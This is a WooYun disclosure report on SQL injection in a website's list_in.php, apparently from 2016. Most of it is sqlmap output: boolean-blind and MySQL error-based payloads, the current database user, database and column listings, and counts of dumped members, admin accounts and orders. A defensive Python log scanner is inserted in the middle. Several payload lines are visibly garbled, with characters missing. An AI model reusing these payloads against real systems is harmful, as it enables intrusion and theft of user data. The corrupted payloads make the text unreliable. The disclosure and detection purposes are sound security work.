WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2016-01-21: Details have been sent to the vendor and are awaiting the vendor's handling
2016-01-21: The vendor has confirmed; details are disclosed to the vendor only
2016-01-31: Details disclosed to core whitehats and experts in the relevant field
2016-02-10: Details disclosed to regular whitehats
2016-02-20: Details disclosed to intern whitehats
2016-03-05: Details disclosed to the public
123
Injection:
http://**.**.**.**/ally/list_in.php?ID=181&res_number=U2013061822564
Both parameters are injectable:
Place: GET
Parameter: ID
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=181 AND 7278=7278&res_number=U2013061822564

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: ID=181 AND (SELECT 8737 FROM(SELECT COUNT(*),CONCAT(0x3a626b713ELECT (CASE WHEN (8737=8737) THEN 1 ELSE 0 END)),0x3a6378713a,FLOOR(RAND(0)* FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&res_number=U2013061822

Place: GET
Parameter: res_number
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: ID=181&res_number=U2013061822564' AND (SELECT 7111 FROM(SELECTT(*),CONCAT(0x3a626b713a,(SELECT (CASE WHEN (7111=7111) THEN 1 ELSE 0 END)),6378713a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY AND 'eyTV'='eyTV
---
there were multiple injection points, please select the one to use for follo injections:
[0] place: GET, parameter: ID, type: Unescaped numeric (default)
[1] place: GET, parameter: res_number, type: Single quoted string
[q] Quit
>
[15:55:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[15:55:51] [INFO] fetching current user
[15:55:52] [INFO] retrieved: yesoneco_yesone@localhost
current user: 'yesoneco_yesone@localhost'
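As an added example that is not part of the original report, the following Python scans Apache access-log lines for the two request shapes sqlmap produced above (the boolean tautology on ID and the MySQL error-based CONCAT/FLOOR(RAND(0)*2)/GROUP BY double query on either parameter), so the same probing of list_in.php can be spotted in logs; the log lines are constructed samples, not the vendor's logs.

```python
import re
from urllib.parse import unquote_plus

# Signatures of the sqlmap techniques recorded in the report above: a boolean
# tautology on the numeric ID parameter, the MySQL error-based double query
# (FLOOR(RAND(0)*2) ... GROUP BY), information_schema probing, and the quoted
# string break used on res_number.
SIGNATURES = {
    "boolean_tautology": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error_based_rand_groupby": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I | re.S),
    "information_schema_probe": re.compile(r"INFORMATION_SCHEMA\.", re.I),
    "quote_break_and": re.compile(r"'\s+AND\s+'[A-Za-z0-9]+'\s*=\s*'", re.I),
}

# Apache combined log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify_query(raw_query):
    """Return the signature names found in a (URL-encoded) query string."""
    decoded = unquote_plus(raw_query)  # sqlmap encodes spaces as %20 or +
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(lines):
    """Parse Apache lines; return (ip, path without query, signatures) per hit."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format, skip rather than crash
        path, _, query = m.group("path").partition("?")
        found = classify_query(query)
        if found:
            hits.append((m.group("ip"), path, found))
    return hits

# Constructed sample lines (not from the report): one benign request followed by
# three shaped like the payloads sqlmap reported against list_in.php.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Jan/2016:15:55:51 +0800] "GET /ally/list_in.php?ID=181&res_number=U2013061822564 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [21/Jan/2016:15:55:51 +0800] "GET /ally/list_in.php?ID=181%20AND%207278=7278&res_number=U2013061822564 HTTP/1.1" 200 5120 "-" "sqlmap/1.0"',
    '203.0.113.5 - - [21/Jan/2016:15:55:52 +0800] "GET /ally/list_in.php?ID=181+AND+(SELECT+1+FROM(SELECT+COUNT(*),CONCAT(0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)&res_number=U2013061822564 HTTP/1.1" 500 312 "-" "sqlmap/1.0"',
    '203.0.113.5 - - [21/Jan/2016:15:55:52 +0800] "GET /ally/list_in.php?ID=181&res_number=U2013061822564%27%20AND%20%27eyTV%27=%27eyTV HTTP/1.1" 200 5120 "-" "sqlmap/1.0"',
]

if __name__ == "__main__":
    for ip, path, sigs in scan_log(SAMPLE_LOG):
        print(ip, path, ",".join(sigs))
```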
available databases [16]:
[*] information_schema
[*] yesoneco_adminuser
[*] yesoneco_ally
[*] yesoneco_design
[*] yesoneco_member
[*] yesoneco_new2015
[*] yesoneco_news
[*] yesoneco_qa
[*] yesoneco_slds
[*] yesoneco_tool
[*] yesoneco_web
[*] yesoneco_webdb
[*] yesoneco_webdb2
[*] yesoneco_webdb_test
[*] yesoneco_webpage
[*] yesoneco_yestop
Table: member
[15 columns]
+-----------------+------------------+
| Column          | Type             |
+-----------------+------------------+
| date            | datetime         |
| ID              | int(11) unsigned |
| number          | text             |
| tel_header      | varchar(100)     |
| user_cell_phone | varchar(100)     |
| user_cell_tel   | varchar(100)     |
| user_email      | varchar(100)     |
| user_how_know   | varchar(100)     |
| user_lastName   | varchar(100)     |
| user_male       | varchar(100)     |
| user_man        | varchar(100)     |
| user_passwd     | varchar(100)     |
| user_rank       | varchar(100)     |
| user_userid     | varchar(100)     |
| web             | varchar(100)     |
+-----------------+------------------+

3 administrator passwords stored in plaintext (3 entries dumped from the member table).
Close to 2000 users:
Database: yesoneco_member
+--------+---------+
| Table  | Entries |
+--------+---------+
| member | 1876    |
+--------+---------+
Database: yesoneco_webdb
+----------+---------+
| Table    | Entries |
+----------+---------+
| customer | 619     |
+----------+---------+
Also leaked: 49 admin accounts:
Database: yesoneco_webdb
+-------+---------+
| Table | Entries |
+-------+---------+
| admin | 49      |
+-------+---------+
Orders:
Database: yesoneco_webdb
+----------+---------+
| Table    | Entries |
+----------+---------+
| ORDER_TB | 4436    |
+----------+---------+
Severity: High
Vulnerability Rank: 18
Confirmation time: 2016-01-21 22:58
Thanks for the report!
None yet